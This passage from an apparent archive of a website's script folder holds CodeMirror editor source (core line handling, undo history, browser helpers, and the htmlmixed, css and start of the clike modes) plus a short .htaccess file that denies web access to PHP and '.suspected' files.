            if (newmark == mark) mk.splice(i--, 1);
          }
        }
      }
      return taken;
    },
    append: function(line) {
      var mylen = this.text.length, mk = line.marked, mymk = this.marked;
      this.text += line.text;
      copyStyles(0, line.text.length, line.styles, this.styles);
      if (mymk) {
        for (var i = 0; i < mymk.length; ++i)
          if (mymk[i].to == null) mymk[i].to = mylen;
      }
      if (mk && mk.length) {
        if (!mymk) this.marked = mymk = [];
        outer: for (var i = 0; i < mk.length; ++i) {
          var mark = mk[i];
          if (!mark.from) {
            for (var j = 0; j < mymk.length; ++j) {
              var mymark = mymk[j];
              if (mymark.to == mylen && mymark.sameSet(mark)) {
                mymark.to = mark.to == null ? null : mark.to + mylen;
                if (mymark.isDead()) {
                  mymark.detach(this);
                  mk.splice(i--, 1);
                }
                continue outer;
              }
            }
          }
          mymk.push(mark);
          mark.attach(this);
          mark.from += mylen;
          if (mark.to != null) mark.to += mylen;
        }
      }
    },
    fixMarkEnds: function(other) {
      var mk = this.marked, omk = other.marked;
      if (!mk) return;
      for (var i = 0; i < mk.length; ++i) {
        var mark = mk[i], close = mark.to == null;
        if (close && omk) {
          for (var j = 0; j < omk.length; ++j)
            if (omk[j].sameSet(mark)) {close = false; break;}
        }
        if (close) mark.to = this.text.length;
      }
    },
    fixMarkStarts: function() {
      var mk = this.marked;
      if (!mk) return;
      for (var i = 0; i < mk.length; ++i)
        if (mk[i].from == null) mk[i].from = 0;
    },
    addMark: function(mark) {
      mark.attach(this);
      if (this.marked == null) this.marked = [];
      this.marked.push(mark);
      this.marked.sort(function(a, b){return (a.from || 0) - (b.from || 0);});
    },
    // Run the given mode's parser over a line, update the styles
    // array, which contains alternating fragments of text and CSS
    // classes.
    highlight: function(mode, state, tabSize) {
      var stream = new StringStream(this.text, tabSize), st = this.styles, pos = 0;
      var changed = false, curWord = st[0], prevWord;
      if (this.text == "" && mode.blankLine) mode.blankLine(state);
      while (!stream.eol()) {
        var style = mode.token(stream, state);
        var substr = this.text.slice(stream.start, stream.pos);
        stream.start = stream.pos;
        if (pos && st[pos-1] == style)
          st[pos-2] += substr;
        else if (substr) {
          if (!changed && (st[pos+1] != style || (pos && st[pos-2] != prevWord))) changed = true;
          st[pos++] = substr; st[pos++] = style;
          prevWord = curWord; curWord = st[pos];
        }
        // Give up when line is ridiculously long
        if (stream.pos > 5000) {
          st[pos++] = this.text.slice(stream.pos); st[pos++] = null;
          break;
        }
      }
      if (st.length != pos) {st.length = pos; changed = true;}
      if (pos && st[pos-2] != prevWord) changed = true;
      // Short lines with simple highlights return null, and are
      // counted as changed by the driver because they are likely to
      // highlight the same way in various contexts.
      return changed || (st.length < 5 && this.text.length < 10 ? null : false);
    },
    // Fetch the parser token for a given character. Useful for hacks
    // that want to inspect the mode state (say, for completion).
    getTokenAt: function(mode, state, ch) {
      var txt = this.text, stream = new StringStream(txt);
      while (stream.pos < ch && !stream.eol()) {
        stream.start = stream.pos;
        var style = mode.token(stream, state);
      }
      return {start: stream.start,
              end: stream.pos,
              string: stream.current(),
              className: style || null,
              state: state};
    },
    indentation: function(tabSize) {return countColumn(this.text, null, tabSize);},
    // Produces an HTML fragment for the line, taking selection,
    // marking, and highlighting into account.
    getHTML: function(makeTab, wrapAt, wrapId, wrapWBR) {
      var html = [], first = true, col = 0;
      function span_(text, style) {
        if (!text) return;
        // Work around a bug where, in some compat modes, IE ignores leading spaces
        if (first && ie && text.charAt(0) == " ") text = "\u00a0" + text.slice(1);
        first = false;
        if (text.indexOf("\t") == -1) {
          col += text.length;
          var escaped = htmlEscape(text);
        } else {
          var escaped = "";
          for (var pos = 0;;) {
            var idx = text.indexOf("\t", pos);
            if (idx == -1) {
              escaped += htmlEscape(text.slice(pos));
              col += text.length - pos;
              break;
            } else {
              col += idx - pos;
              var tab = makeTab(col);
              escaped += htmlEscape(text.slice(pos, idx)) + tab.html;
              col += tab.width;
              pos = idx + 1;
            }
          }
        }
        if (style) html.push('<span class="', style, '">', escaped, "</span>");
        else html.push(escaped);
      }
      var span = span_;
      if (wrapAt != null) {
        var outPos = 0, open = "<span id=\"" + wrapId + "\">";
        span = function(text, style) {
          var l = text.length;
          if (wrapAt >= outPos && wrapAt < outPos + l) {
            if (wrapAt > outPos) {
              span_(text.slice(0, wrapAt - outPos), style);
              // See comment at the definition of spanAffectsWrapping
              if (wrapWBR) html.push("<wbr>");
            }
            html.push(open);
            var cut = wrapAt - outPos;
            span_(opera ? text.slice(cut, cut + 1) : text.slice(cut), style);
            html.push("</span>");
            if (opera) span_(text.slice(cut + 1), style);
            wrapAt--;
            outPos += l;
          } else {
            outPos += l;
            span_(text, style);
            // Output empty wrapper when at end of line
            if (outPos == wrapAt && outPos == len) html.push(open + " </span>");
            // Stop outputting HTML when gone sufficiently far beyond measure
            else if (outPos > wrapAt + 10 && /\s/.test(text)) span = function(){};
          }
        }
      }

      var st = this.styles, allText = this.text, marked = this.marked;
      var len = allText.length;
      function styleToClass(style) {
        if (!style) return null;
        return "cm-" + style.replace(/ +/g, " cm-");
      }

      if (!allText && wrapAt == null) {
        span(" ");
      } else if (!marked || !marked.length) {
        for (var i = 0, ch = 0; ch < len; i+=2) {
          var str = st[i], style = st[i+1], l = str.length;
          if (ch + l > len) str = str.slice(0, len - ch);
          ch += l;
          span(str, styleToClass(style));
        }
      } else {
        var pos = 0, i = 0, text = "", style, sg = 0;
        var nextChange = marked[0].from || 0, marks = [], markpos = 0;
        function advanceMarks() {
          var m;
          while (markpos < marked.length &&
                 ((m = marked[markpos]).from == pos || m.from == null)) {
            if (m.style != null) marks.push(m);
            ++markpos;
          }
          nextChange = markpos < marked.length ? marked[markpos].from : Infinity;
          for (var i = 0; i < marks.length; ++i) {
            var to = marks[i].to || Infinity;
            if (to == pos) marks.splice(i--, 1);
            else nextChange = Math.min(to, nextChange);
          }
        }
        var m = 0;
        while (pos < len) {
          if (nextChange == pos) advanceMarks();
          var upto = Math.min(len, nextChange);
          while (true) {
            if (text) {
              var end = pos + text.length;
              var appliedStyle = style;
              for (var j = 0; j < marks.length; ++j)
                appliedStyle = (appliedStyle ? appliedStyle + " " : "") + marks[j].style;
              span(end > upto ? text.slice(0, upto - pos) : text, appliedStyle);
              if (end >= upto) {text = text.slice(upto - pos); pos = upto; break;}
              pos = end;
            }
            text = st[i++]; style = styleToClass(st[i++]);
          }
        }
      }
      return html.join("");
    },
    cleanUp: function() {
      this.parent = null;
      if (this.marked)
        for (var i = 0, e = this.marked.length; i < e; ++i) this.marked[i].detach(this);
    }
  };
  // Utility used by replace and split above
  function copyStyles(from, to, source, dest) {
    for (var i = 0, pos = 0, state = 0; pos < to; i+=2) {
      var part = source[i], end = pos + part.length;
      if (state == 0) {
        if (end > from) dest.push(part.slice(from - pos, Math.min(part.length, to - pos)), source[i+1]);
        if (end >= from) state = 1;
      } else if (state == 1) {
        if (end > to) dest.push(part.slice(0, to - pos), source[i+1]);
        else dest.push(part, source[i+1]);
      }
      pos = end;
    }
  }

  // Data structure that holds the sequence of lines.
  function LeafChunk(lines) {
    this.lines = lines;
    this.parent = null;
    for (var i = 0, e = lines.length, height = 0; i < e; ++i) {
      lines[i].parent = this;
      height += lines[i].height;
    }
    this.height = height;
  }
  LeafChunk.prototype = {
    chunkSize: function() { return this.lines.length; },
    remove: function(at, n, callbacks) {
      for (var i = at, e = at + n; i < e; ++i) {
        var line = this.lines[i];
        this.height -= line.height;
        line.cleanUp();
        if (line.handlers)
          for (var j = 0; j < line.handlers.length; ++j) callbacks.push(line.handlers[j]);
      }
      this.lines.splice(at, n);
    },
    collapse: function(lines) {
      lines.splice.apply(lines, [lines.length, 0].concat(this.lines));
    },
    insertHeight: function(at, lines, height) {
      this.height += height;
      this.lines = this.lines.slice(0, at).concat(lines).concat(this.lines.slice(at));
      for (var i = 0, e = lines.length; i < e; ++i) lines[i].parent = this;
    },
    iterN: function(at, n, op) {
      for (var e = at + n; at < e; ++at)
        if (op(this.lines[at])) return true;
    }
  };
  function BranchChunk(children) {
    this.children = children;
    var size = 0, height = 0;
    for (var i = 0, e = children.length; i < e; ++i) {
      var ch = children[i];
      size += ch.chunkSize(); height += ch.height;
      ch.parent = this;
    }
    this.size = size;
    this.height = height;
    this.parent = null;
  }
  BranchChunk.prototype = {
    chunkSize: function() { return this.size; },
    remove: function(at, n, callbacks) {
      this.size -= n;
      for (var i = 0; i < this.children.length; ++i) {
        var child = this.children[i], sz = child.chunkSize();
        if (at < sz) {
          var rm = Math.min(n, sz - at), oldHeight = child.height;
          child.remove(at, rm, callbacks);
          this.height -= oldHeight - child.height;
          if (sz == rm) { this.children.splice(i--, 1); child.parent = null; }
          if ((n -= rm) == 0) break;
          at = 0;
        } else at -= sz;
      }
      if (this.size - n < 25) {
        var lines = [];
        this.collapse(lines);
        this.children = [new LeafChunk(lines)];
        this.children[0].parent = this;
      }
    },
    collapse: function(lines) {
      for (var i = 0, e = this.children.length; i < e; ++i) this.children[i].collapse(lines);
    },
    insert: function(at, lines) {
      var height = 0;
      for (var i = 0, e = lines.length; i < e; ++i) height += lines[i].height;
      this.insertHeight(at, lines, height);
    },
    insertHeight: function(at, lines, height) {
      this.size += lines.length;
      this.height += height;
      for (var i = 0, e = this.children.length; i < e; ++i) {
        var child = this.children[i], sz = child.chunkSize();
        if (at <= sz) {
          child.insertHeight(at, lines, height);
          if (child.lines && child.lines.length > 50) {
            while (child.lines.length > 50) {
              var spilled = child.lines.splice(child.lines.length - 25, 25);
              var newleaf = new LeafChunk(spilled);
              child.height -= newleaf.height;
              this.children.splice(i + 1, 0, newleaf);
              newleaf.parent = this;
            }
            this.maybeSpill();
          }
          break;
        }
        at -= sz;
      }
    },
    maybeSpill: function() {
      if (this.children.length <= 10) return;
      var me = this;
      do {
        var spilled = me.children.splice(me.children.length - 5, 5);
        var sibling = new BranchChunk(spilled);
        if (!me.parent) { // Become the parent node
          var copy = new BranchChunk(me.children);
          copy.parent = me;
          me.children = [copy, sibling];
          me = copy;
        } else {
          me.size -= sibling.size;
          me.height -= sibling.height;
          var myIndex = indexOf(me.parent.children, me);
          me.parent.children.splice(myIndex + 1, 0, sibling);
        }
        sibling.parent = me.parent;
      } while (me.children.length > 10);
      me.parent.maybeSpill();
    },
    iter: function(from, to, op) { this.iterN(from, to - from, op); },
    iterN: function(at, n, op) {
      for (var i = 0, e = this.children.length; i < e; ++i) {
        var child = this.children[i], sz = child.chunkSize();
        if (at < sz) {
          var used = Math.min(n, sz - at);
          if (child.iterN(at, used, op)) return true;
          if ((n -= used) == 0) break;
          at = 0;
        } else at -= sz;
      }
    }
  };

  function getLineAt(chunk, n) {
    while (!chunk.lines) {
      for (var i = 0;; ++i) {
        var child = chunk.children[i], sz = child.chunkSize();
        if (n < sz) { chunk = child; break; }
        n -= sz;
      }
    }
    return chunk.lines[n];
  }
  function lineNo(line) {
    if (line.parent == null) return null;
    var cur = line.parent, no = indexOf(cur.lines, line);
    for (var chunk = cur.parent; chunk; cur = chunk, chunk = chunk.parent) {
      for (var i = 0, e = chunk.children.length; ; ++i) {
        if (chunk.children[i] == cur) break;
        no += chunk.children[i].chunkSize();
      }
    }
    return no;
  }
  function lineAtHeight(chunk, h) {
    var n = 0;
    outer: do {
      for (var i = 0, e = chunk.children.length; i < e; ++i) {
        var child = chunk.children[i], ch = child.height;
        if (h < ch) { chunk = child; continue outer; }
        h -= ch;
        n += child.chunkSize();
      }
      return n;
    } while (!chunk.lines);
    for (var i = 0, e = chunk.lines.length; i < e; ++i) {
      var line = chunk.lines[i], lh = line.height;
      if (h < lh) break;
      h -= lh;
    }
    return n + i;
  }
  function heightAtLine(chunk, n) {
    var h = 0;
    outer: do {
      for (var i = 0, e = chunk.children.length; i < e; ++i) {
        var child = chunk.children[i], sz = child.chunkSize();
        if (n < sz) { chunk = child; continue outer; }
        n -= sz;
        h += child.height;
      }
      return h;
    } while (!chunk.lines);
    for (var i = 0; i < n; ++i) h += chunk.lines[i].height;
    return h;
  }

  // The history object 'chunks' changes that are made close together
  // and at almost the same time into bigger undoable units.
  function History() {
    this.time = 0;
    this.done = []; this.undone = [];
    this.compound = 0;
    this.closed = false;
  }
  History.prototype = {
    addChange: function(start, added, old) {
      this.undone.length = 0;
      var time = +new Date, cur = this.done[this.done.length - 1], last = cur && cur[cur.length - 1];
      var dtime = time - this.time;

      if (this.compound && cur && !this.closed) {
        cur.push({start: start, added: added, old: old});
      } else if (dtime > 400 || !last || this.closed ||
                 last.start > start + old.length || last.start + last.added < start) {
        this.done.push([{start: start, added: added, old: old}]);
        this.closed = false;
      } else {
        var startBefore = Math.max(0, last.start - start),
            endAfter = Math.max(0, (start + old.length) - (last.start + last.added));
        for (var i = startBefore; i > 0; --i) last.old.unshift(old[i - 1]);
        for (var i = endAfter; i > 0; --i) last.old.push(old[old.length - i]);
        if (startBefore) last.start = start;
        last.added += added - (old.length - startBefore - endAfter);
      }
      this.time = time;
    },
    startCompound: function() {
      if (!this.compound++) this.closed = true;
    },
    endCompound: function() {
      if (!--this.compound) this.closed = true;
    }
  };

  function stopMethod() {e_stop(this);}
  // Ensure an event has a stop method.
  function addStop(event) {
    if (!event.stop) event.stop = stopMethod;
    return event;
  }

  function e_preventDefault(e) {
    if (e.preventDefault) e.preventDefault();
    else e.returnValue = false;
  }
  function e_stopPropagation(e) {
    if (e.stopPropagation) e.stopPropagation();
    else e.cancelBubble = true;
  }
  function e_stop(e) {e_preventDefault(e); e_stopPropagation(e);}
  CodeMirror.e_stop = e_stop;
  CodeMirror.e_preventDefault = e_preventDefault;
  CodeMirror.e_stopPropagation = e_stopPropagation;

  function e_target(e) {return e.target || e.srcElement;}
  function e_button(e) {
    if (e.which) return e.which;
    else if (e.button & 1) return 1;
    else if (e.button & 2) return 3;
    else if (e.button & 4) return 2;
  }

  // Allow 3rd-party code to override event properties by adding an override
  // object to an event object.
  function e_prop(e, prop) {
    var overridden = e.override && e.override.hasOwnProperty(prop);
    return overridden ? e.override[prop] : e[prop];
  }

  // Event handler registration. If disconnect is true, it'll return a
  // function that unregisters the handler.
  function connect(node, type, handler, disconnect) {
    if (typeof node.addEventListener == "function") {
      node.addEventListener(type, handler, false);
      if (disconnect) return function() {node.removeEventListener(type, handler, false);};
    } else {
      var wrapHandler = function(event) {handler(event || window.event);};
      node.attachEvent("on" + type, wrapHandler);
      if (disconnect) return function() {node.detachEvent("on" + type, wrapHandler);};
    }
  }
  CodeMirror.connect = connect;

  function Delayed() {this.id = null;}
  Delayed.prototype = {set: function(ms, f) {clearTimeout(this.id); this.id = setTimeout(f, ms);}};

  var Pass = CodeMirror.Pass = {toString: function(){return "CodeMirror.Pass";}};

  var gecko = /gecko\/\d{7}/i.test(navigator.userAgent);
  var ie = /MSIE \d/.test(navigator.userAgent);
  var ie_lt8 = /MSIE [1-7]\b/.test(navigator.userAgent);
  var ie_lt9 = /MSIE [1-8]\b/.test(navigator.userAgent);
  var quirksMode = ie && document.documentMode == 5;
  var webkit = /WebKit\//.test(navigator.userAgent);
  var chrome = /Chrome\//.test(navigator.userAgent);
  var opera = /Opera\//.test(navigator.userAgent);
  var safari = /Apple Computer/.test(navigator.vendor);
  var khtml = /KHTML\//.test(navigator.userAgent);
  var mac_geLion = /Mac OS X 10\D([7-9]|\d\d)\D/.test(navigator.userAgent);

  // Detect drag-and-drop
  var dragAndDrop = function() {
    // There is *some* kind of drag-and-drop support in IE6-8, but I
    // couldn't get it to work yet.
    if (ie_lt9) return false;
    var div = document.createElement('div');
    return "draggable" in div || "dragDrop" in div;
  }();

  // Feature-detect whether newlines in textareas are converted to \r\n
  var lineSep = function () {
    var te = document.createElement("textarea");
    te.value = "foo\nbar";
    if (te.value.indexOf("\r") > -1) return "\r\n";
    return "\n";
  }();

  // For a reason I have yet to figure out, some browsers disallow
  // word wrapping between certain characters *only* if a new inline
  // element is started between them. This makes it hard to reliably
  // measure the position of things, since that requires inserting an
  // extra span. This terribly fragile set of regexps matches the
  // character combinations that suffer from this phenomenon on the
  // various browsers.
  var spanAffectsWrapping = /^$/; // Won't match any two-character string
  if (gecko) spanAffectsWrapping = /$'/;
  else if (safari) spanAffectsWrapping = /\-[^ \-?]|\?[^ !'\"\),.\-\/:;\?\]\}]/;
  else if (chrome) spanAffectsWrapping = /\-[^ \-\.?]|\?[^ \-\.?\]\}:;!'\"\),\/]|[\.!\"#&%\)*+,:;=>\]|\}~][\(\{\[<]|\$'/;

  // Counts the column offset in a string, taking tabs into account.
  // Used mostly to find indentation.
  function countColumn(string, end, tabSize) {
    if (end == null) {
      end = string.search(/[^\s\u00a0]/);
      if (end == -1) end = string.length;
    }
    for (var i = 0, n = 0; i < end; ++i) {
      if (string.charAt(i) == "\t") n += tabSize - (n % tabSize);
      else ++n;
    }
    return n;
  }

  function computedStyle(elt) {
    if (elt.currentStyle) return elt.currentStyle;
    return window.getComputedStyle(elt, null);
  }

  // Find the position of an element by following the offsetParent chain.
  // If screen==true, it returns screen (rather than page) coordinates.
  function eltOffset(node, screen) {
    var bod = node.ownerDocument.body;
    var x = 0, y = 0, skipBody = false;
    for (var n = node; n; n = n.offsetParent) {
      var ol = n.offsetLeft, ot = n.offsetTop;
      // Firefox reports weird inverted offsets when the body has a border.
      if (n == bod) { x += Math.abs(ol); y += Math.abs(ot); }
      else { x += ol, y += ot; }
      if (screen && computedStyle(n).position == "fixed")
        skipBody = true;
    }
    var e = screen && !skipBody ? null : bod;
    for (var n = node.parentNode; n != e; n = n.parentNode)
      if (n.scrollLeft != null) { x -= n.scrollLeft; y -= n.scrollTop;}
    return {left: x, top: y};
  }
  // Use the faster and saner getBoundingClientRect method when possible.
  if (document.documentElement.getBoundingClientRect != null) eltOffset = function(node, screen) {
    // Take the parts of bounding client rect that we are interested in so we are able to edit if need be,
    // since the returned value cannot be changed externally (they are kept in sync as the element moves within the page)
    try { var box = node.getBoundingClientRect(); box = { top: box.top, left: box.left }; }
    catch(e) { box = {top: 0, left: 0}; }
    if (!screen) {
      // Get the toplevel scroll, working around browser differences.
      if (window.pageYOffset == null) {
        var t = document.documentElement || document.body.parentNode;
        if (t.scrollTop == null) t = document.body;
        box.top += t.scrollTop; box.left += t.scrollLeft;
      } else {
        box.top += window.pageYOffset; box.left += window.pageXOffset;
      }
    }
    return box;
  };

  // Get a node's text content.
  function eltText(node) {
    return node.textContent || node.innerText || node.nodeValue || "";
  }
  function selectInput(node) {
    if (ios) { // Mobile Safari apparently has a bug where select() is broken.
      node.selectionStart = 0;
      node.selectionEnd = node.value.length;
    } else node.select();
  }

  // Operations on {line, ch} objects.
  function posEq(a, b) {return a.line == b.line && a.ch == b.ch;}
  function posLess(a, b) {return a.line < b.line || (a.line == b.line && a.ch < b.ch);}
  function copyPos(x) {return {line: x.line, ch: x.ch};}

  var escapeElement = document.createElement("pre");
  function htmlEscape(str) {
    escapeElement.textContent = str;
    return escapeElement.innerHTML;
  }
  // Recent (late 2011) Opera betas insert bogus newlines at the start
  // of the textContent, so we strip those.
  if (htmlEscape("a") == "\na") {
    htmlEscape = function(str) {
      escapeElement.textContent = str;
      return escapeElement.innerHTML.slice(1);
    };
  // Some IEs don't preserve tabs through innerHTML
  } else if (htmlEscape("\t") != "\t") {
    htmlEscape = function(str) {
      escapeElement.innerHTML = "";
      escapeElement.appendChild(document.createTextNode(str));
      return escapeElement.innerHTML;
    };
  }
  CodeMirror.htmlEscape = htmlEscape;

  // Used to position the cursor after an undo/redo by finding the
  // last edited character.
  function editEnd(from, to) {
    if (!to) return 0;
    if (!from) return to.length;
    for (var i = from.length, j = to.length; i >= 0 && j >= 0; --i, --j)
      if (from.charAt(i) != to.charAt(j)) break;
    return j + 1;
  }

  function indexOf(collection, elt) {
    if (collection.indexOf) return collection.indexOf(elt);
    for (var i = 0, e = collection.length; i < e; ++i)
      if (collection[i] == elt) return i;
    return -1;
  }
  function isWordChar(ch) {
    return /\w/.test(ch) || ch.toUpperCase() != ch.toLowerCase();
  }

  // See if "".split is the broken IE version, if so, provide an
  // alternative way to split lines.
  var splitLines = "\n\nb".split(/\n/).length != 3 ? function(string) {
    var pos = 0, nl, result = [];
    while ((nl = string.indexOf("\n", pos)) > -1) {
      result.push(string.slice(pos, string.charAt(nl-1) == "\r" ? nl - 1 : nl));
      pos = nl + 1;
    }
    result.push(string.slice(pos));
    return result;
  } : function(string){return string.split(/\r?\n/);};
  CodeMirror.splitLines = splitLines;

  var hasSelection = window.getSelection ? function(te) {
    try { return te.selectionStart != te.selectionEnd; }
    catch(e) { return false; }
  } : function(te) {
    try {var range = te.ownerDocument.selection.createRange();}
    catch(e) {}
    if (!range || range.parentElement() != te) return false;
    return range.compareEndPoints("StartToEnd", range) != 0;
  };

  CodeMirror.defineMode("null", function() {
    return {token: function(stream) {stream.skipToEnd();}};
  });
  CodeMirror.defineMIME("text/plain", "null");

  var keyNames = {3: "Enter", 8: "Backspace", 9: "Tab", 13: "Enter", 16: "Shift", 17: "Ctrl", 18: "Alt",
                  19: "Pause", 20: "CapsLock", 27: "Esc", 32: "Space", 33: "PageUp", 34: "PageDown", 35: "End",
                  36: "Home", 37: "Left", 38: "Up", 39: "Right", 40: "Down", 44: "PrintScrn", 45: "Insert",
                  46: "Delete", 59: ";", 91: "Mod", 92: "Mod", 93: "Mod", 109: "-", 107: "=", 127: "Delete",
                  186: ";", 187: "=", 188: ",", 189: "-", 190: ".", 191: "/", 192: "`", 219: "[", 220: "\\",
                  221: "]", 222: "'", 63276: "PageUp", 63277: "PageDown", 63275: "End", 63273: "Home",
                  63234: "Left", 63232: "Up", 63235: "Right", 63233: "Down", 63302: "Insert", 63272: "Delete"};
  CodeMirror.keyNames = keyNames;
  (function() {
    // Number keys
    for (var i = 0; i < 10; i++) keyNames[i + 48] = String(i);
    // Alphabetic keys
    for (var i = 65; i <= 90; i++) keyNames[i] = String.fromCharCode(i);
    // Function keys
    for (var i = 1; i <= 12; i++) keyNames[i + 111] = keyNames[i + 63235] = "F" + i;
  })();

  return CodeMirror;
})();
js/layout/htmlmixed.js000060400000005615152434416630011041 0ustar00CodeMirror.defineMode("htmlmixed", function(config, parserConfig) {
  var htmlMode = CodeMirror.getMode(config, {name: "xml", htmlMode: true});
  var jsMode = CodeMirror.getMode(config, "javascript");
  var cssMode = CodeMirror.getMode(config, "css");

  function html(stream, state) {
    var style = htmlMode.token(stream, state.htmlState);
    if (style == "tag" && stream.current() == ">" && state.htmlState.context) {
      if (/^script$/i.test(state.htmlState.context.tagName)) {
        state.token = javascript;
        state.localState = jsMode.startState(htmlMode.indent(state.htmlState, ""));
        state.mode = "javascript";
      }
      else if (/^style$/i.test(state.htmlState.context.tagName)) {
        state.token = css;
        state.localState = cssMode.startState(htmlMode.indent(state.htmlState, ""));
        state.mode = "css";
      }
    }
    return style;
  }
  function maybeBackup(stream, pat, style) {
    var cur = stream.current();
    var close = cur.search(pat);
    if (close > -1) stream.backUp(cur.length - close);
    return style;
  }
  function javascript(stream, state) {
    if (stream.match(/^<\/\s*script\s*>/i, false)) {
      state.token = html;
      state.localState = null;
      state.mode = "html";
      return html(stream, state);
    }
    return maybeBackup(stream, /<\/\s*script\s*>/,
                       jsMode.token(stream, state.localState));
  }
  function css(stream, state) {
    if (stream.match(/^<\/\s*style\s*>/i, false)) {
      state.token = html;
      state.localState = null;
      state.mode = "html";
      return html(stream, state);
    }
    return maybeBackup(stream, /<\/\s*style\s*>/,
                       cssMode.token(stream, state.localState));
  }

  return {
    startState: function() {
      var state = htmlMode.startState();
      return {token: html, localState: null, mode: "html", htmlState: state};
    },

    copyState: function(state) {
      if (state.localState)
        var local = CodeMirror.copyState(state.token == css ? cssMode : jsMode, state.localState);
      return {token: state.token, localState: local, mode: state.mode,
              htmlState: CodeMirror.copyState(htmlMode, state.htmlState)};
    },

    token: function(stream, state) {
      return state.token(stream, state);
    },

    indent: function(state, textAfter) {
      if (state.token == html || /^\s*<\//.test(textAfter))
        return htmlMode.indent(state.htmlState, textAfter);
      else if (state.token == javascript)
        return jsMode.indent(state.localState, textAfter);
      else
        return cssMode.indent(state.localState, textAfter);
    },

    compareStates: function(a, b) {
      if (a.mode != b.mode) return false;
      if (a.localState) return CodeMirror.Pass;
      return htmlMode.compareStates(a.htmlState, b.htmlState);
    },

    electricChars: "/{}:"
  }
}, "xml", "javascript", "css");

CodeMirror.defineMIME("text/html", "htmlmixed");
js/layout/css.js000060400000007076152434416630007641 0ustar00CodeMirror.defineMode("css", function(config) {
  var indentUnit = config.indentUnit, type;
  function ret(style, tp) {type = tp; return style;}

  function tokenBase(stream, state) {
    var ch = stream.next();
    if (ch == "@") {stream.eatWhile(/[\w\\\-]/); return ret("meta", stream.current());}
    else if (ch == "/" && stream.eat("*")) {
      state.tokenize = tokenCComment;
      return tokenCComment(stream, state);
    }
    else if (ch == "<" && stream.eat("!")) {
      state.tokenize = tokenSGMLComment;
      return tokenSGMLComment(stream, state);
    }
    else if (ch == "=") ret(null, "compare");
    else if ((ch == "~" || ch == "|") && stream.eat("=")) return ret(null, "compare");
    else if (ch == "\"" || ch == "'") {
      state.tokenize = tokenString(ch);
      return state.tokenize(stream, state);
    }
    else if (ch == "#") {
      stream.eatWhile(/[\w\\\-]/);
      return ret("atom", "hash");
    }
    else if (ch == "!") {
      stream.match(/^\s*\w*/);
      return ret("keyword", "important");
    }
    else if (/\d/.test(ch)) {
      stream.eatWhile(/[\w.%]/);
      return ret("number", "unit");
    }
    else if (/[,.+>*\/]/.test(ch)) {
      return ret(null, "select-op");
    }
    else if (/[;{}:\[\]]/.test(ch)) {
      return ret(null, ch);
    }
    else {
      stream.eatWhile(/[\w\\\-]/);
      return ret("variable", "variable");
    }
  }

  function tokenCComment(stream, state) {
    var maybeEnd = false, ch;
    while ((ch = stream.next()) != null) {
      if (maybeEnd && ch == "/") {
        state.tokenize = tokenBase;
        break;
      }
      maybeEnd = (ch == "*");
    }
    return ret("comment", "comment");
  }

  function tokenSGMLComment(stream, state) {
    var dashes = 0, ch;
    while ((ch = stream.next()) != null) {
      if (dashes >= 2 && ch == ">") {
        state.tokenize = tokenBase;
        break;
      }
      dashes = (ch == "-") ? dashes + 1 : 0;
    }
    return ret("comment", "comment");
  }

  function tokenString(quote) {
    return function(stream, state) {
      var escaped = false, ch;
      while ((ch = stream.next()) != null) {
        if (ch == quote && !escaped)
          break;
        escaped = !escaped && ch == "\\";
      }
      if (!escaped) state.tokenize = tokenBase;
      return ret("string", "string");
    };
  }

  return {
    startState: function(base) {
      return {tokenize: tokenBase,
              baseIndent: base || 0,
              stack: []};
    },

    token: function(stream, state) {
      if (stream.eatSpace()) return null;
      var style = state.tokenize(stream, state);

      var context = state.stack[state.stack.length-1];
      if (type == "hash" && context != "rule") style = "string-2";
      else if (style == "variable") {
        if (context == "rule") style = "number";
        else if (!context || context == "@media{") style = "tag";
      }

      if (context == "rule" && /^[\{\};]$/.test(type))
        state.stack.pop();
      if (type == "{") {
        if (context == "@media") state.stack[state.stack.length-1] = "@media{";
        else state.stack.push("{");
      }
      else if (type == "}") state.stack.pop();
      else if (type == "@media") state.stack.push("@media");
      else if (context == "{" && type != "comment") state.stack.push("rule");
      return style;
    },

    indent: function(state, textAfter) {
      var n = state.stack.length;
      if (/^\}/.test(textAfter))
        n -= state.stack[state.stack.length-1] == "rule" ? 2 : 1;
      return state.baseIndent + n * indentUnit;
    },

    electricChars: "}"
  };
});

CodeMirror.defineMIME("text/css", "css");
js/layout/.htaccess000044400000000424152434416630010301 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>js/layout/clike.js000060400000023714152434416630010135 0ustar00CodeMirror.defineMode("clike", function(config, parserConfig) {
  var indentUnit = config.indentUnit,
      keywords = parserConfig.keywords || {},
      blockKeywords = parserConfig.blockKeywords || {},
      atoms = parserConfig.atoms || {},
      hooks = parserConfig.hooks || {},
      multiLineStrings = parserConfig.multiLineStrings;
  var isOperatorChar = /[+\-*&%=<>!?|\/]/;

  var curPunc;

  function tokenBase(stream, state) {
    var ch = stream.next();
    if (hooks[ch]) {
      var result = hooks[ch](stream, state);
      if (result !== false) return result;
    }
    if (ch == '"' || ch == "'") {
      state.tokenize = tokenString(ch);
      return state.tokenize(stream, state);
    }
    if (/[\[\]{}\(\),;\:\.]/.test(ch)) {
      curPunc = ch;
      return null;
    }
    if (/\d/.test(ch)) {
      stream.eatWhile(/[\w\.]/);
      return "number";
    }
    if (ch == "/") {
      if (stream.eat("*")) {
        state.tokenize = tokenComment;
        return tokenComment(stream, state);
      }
      if (stream.eat("/")) {
        stream.skipToEnd();
        return "comment";
      }
    }
    if (isOperatorChar.test(ch)) {
      stream.eatWhile(isOperatorChar);
      return "operator";
    }
    stream.eatWhile(/[\w\$_]/);
    var cur = stream.current();
    if (keywords.propertyIsEnumerable(cur)) {
      if (blockKeywords.propertyIsEnumerable(cur)) curPunc = "newstatement";
      return "keyword";
    }
    if (atoms.propertyIsEnumerable(cur)) return "atom";
    return "word";
  }

  function tokenString(quote) {
    return function(stream, state) {
      var escaped = false, next, end = false;
      while ((next = stream.next()) != null) {
        if (next == quote && !escaped) {end = true; break;}
        escaped = !escaped && next == "\\";
      }
      if (end || !(escaped || multiLineStrings))
        state.tokenize = null;
      return "string";
    };
  }

  function tokenComment(stream, state) {
    var maybeEnd = false, ch;
    while (ch = stream.next()) {
      if (ch == "/" && maybeEnd) {
        state.tokenize = null;
        break;
      }
      maybeEnd = (ch == "*");
    }
    return "comment";
  }

  function Context(indented, column, type, align, prev) {
    this.indented = indented;
